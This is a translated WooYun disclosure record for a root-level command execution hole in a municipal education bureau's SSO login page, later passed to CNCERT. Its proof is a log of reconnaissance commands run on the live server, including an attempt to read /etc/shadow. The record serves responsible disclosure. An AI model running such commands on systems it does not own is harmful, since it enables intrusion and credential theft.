
Vulnerability summary

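Bug ID: wooyun-2015-0153547

Title: Command execution vulnerability on a municipal education bureau's official website, getshell

Vendor: cncert (National Internet Emergency Center)

Author: 朱元璋

Submitted: 2015-11-11 15:56

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: System/service patches not applied in time

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org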

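Vulnerability details

Disclosure status:

2015-11-11: Details sent to the vendor; waiting for the vendor to handle them
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details disclosed to core white hats and experts in related fields
2015-12-13: Details disclosed to regular white hats
2015-12-23: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

RT

Detailed description:

Open the official website at http://**.**.**.**/ and click the link marked in the screenshot.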

The linked address **.**.**.**:8080/SSOServer/login_checkUser.action has a command execution vulnerability.

Proof of vulnerability:

 
> whoami
====================================================================================================================================
root
> id
====================================================================================================================================
uid=0(root) gid=0(root) ?=0(root) ??=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
> ifconfig
====================================================================================================================================
> ls
====================================================================================================================================
bin
conf
G:
lib
LICENSE
logs
NOTICE
RELEASE-NOTES
RUNNING.txt
temp
webapps
work
> uname -a
====================================================================================================================================
Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Tue Jan 29 11:48:01 EST 2013 i686 i686 i386 GNU/Linux
> uname -r
====================================================================================================================================
2.6.32-358.el6.i686
> lsb_release -a
====================================================================================================================================
LSB Version: :base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
> cat /etc/issue
====================================================================================================================================
Red Hat Enterprise Linux Server release 6.4 (Santiago)
Kernel \r on an \m
> cat /etc/lsb-release
====================================================================================================================================
LSB_VERSION=base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
> cat /proc/version
====================================================================================================================================
Linux version 2.6.32-358.el6.i686 (mockbuild@**.**.**.**) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jan 29 11:48:01 EST 2013
> cat /etc/shadow
====================================================================================================================================
> chkconfig --list
====================================================================================================================================
> chkconfig --list atd
====================================================================================================================================
atd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
> cat /etc/resolv.conf
====================================================================================================================================
# Generated by NetworkManager
nameserver **.**.**.**
> netstat -na
====================================================================================================================================

Remediation:

Strengthen security awareness

Copyright notice: please credit the source when reposting: 朱元璋@乌云


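Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-23 09:39

Vendor reply:

CNVD confirmed and reproduced the vulnerability as described. It has been passed to CNCERT for dispatch to the Henan sub-center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None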

